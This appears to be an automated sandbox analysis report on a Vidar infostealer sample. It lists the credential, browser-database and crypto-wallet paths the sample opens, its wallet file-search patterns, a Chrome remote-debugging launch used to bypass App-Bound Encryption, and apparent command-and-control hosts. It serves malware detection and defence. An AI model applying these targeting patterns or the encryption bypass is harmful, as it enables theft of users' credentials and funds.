              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.26093.20806.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417842 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_00417842
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00414CDB EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,4_2_00414CDB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0040DDBF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A2A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe PID: 6652, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2380, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*,*.txt
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \MultiDoge\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2380, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a47a000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2c0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a260000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a280000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe.a2a0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2206109646.000000000A2A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe PID: 6652, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 2380, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		1
              Extra Window Memory Injection              		1
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol4
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)411
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Screen Capture              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Extra Window Memory Injection              		NTDS34
              System Information Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets11
              Security Software Discovery              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts411
              Process Injection              		Cached Domain Credentials12
              Process Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1615993 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 15/02/2025 Architecture: WINDOWS Score: 100 29 xu3.201008281.xyz 2->29 31 t.me 2->31 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 53 5 other signatures 2->53 9 SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe 2->9         started        signatures3 51 Performs DNS queries to domains with low reputation 29->51 process4 signatures5 55 Writes to foreign memory regions 9->55 57 Allocates memory in foreign processes 9->57 59 Injects a PE file into a foreign processes 9->59 12 BitLockerToGo.exe 32 9->12         started        process6 dnsIp7 39 xu3.201008281.xyz 88.99.124.230, 443, 49902, 49910 HETZNER-ASDE Germany 12->39 41 t.me 149.154.167.99, 443, 49893 TELEGRAMRU United Kingdom 12->41 43 2 other IPs or domains 12->43 23 C:\ProgramData\im7gd\ctr1d2, PE32+ 12->23 dropped 61 Attempt to bypass Chrome Application-Bound Encryption 12->61 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 12->65 67 5 other signatures 12->67 17 chrome.exe 12->17         started        file8 signatures9 process10 dnsIp11 25 192.168.2.4, 138, 443, 49737 unknown unknown 17->25 27 239.255.255.250 unknown Reserved 17->27 20 chrome.exe 17->20         started        process12 dnsIp13 33 play.google.com 142.250.185.110, 443, 50018 GOOGLEUS United States 20->33 35 plus.l.google.com 142.250.185.78, 443, 50007 GOOGLEUS United States 20->35 37 2 other IPs or domains 20->37

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe32%VirustotalBrowse
              SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe35%ReversingLabsWin32.Trojan.Generic
              SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe100%AviraTR/Crypt.XPACK.Gen

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\im7gd\ctr1d20%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://77.239.117.222:443hellohttps://t.me/b4cha00oomaino5Mozilla/5.00%Avira URL Cloudsafe
              https://xu3.201008281.xyz/00%Avira URL Cloudsafe
              https://xu3.201008281.xyzr#0%Avira URL Cloudsafe
              https://xu3.201008281.xyzb0%Avira URL Cloudsafe
              https://xu3.201008281.xyzL0%Avira URL Cloudsafe
              https://xu3.201008281.xyz/?0%Avira URL Cloudsafe
              https://xu3.201008281.xyzo#0%Avira URL Cloudsafe
              https://xu3.201008281.xyz/tem320%Avira URL Cloudsafe
              https://xu3.201008281.xyz/20%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              plus.l.google.com
              		142.250.185.78
              		truefalse
                		high
                play.google.com
                		142.250.185.110
                		truefalse
                  		high
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high
                    www.google.com
                    		216.58.206.36
                    		truefalse
                      		high
                      xu3.201008281.xyz
                      		88.99.124.230
                      		truetrue
                        		unknown
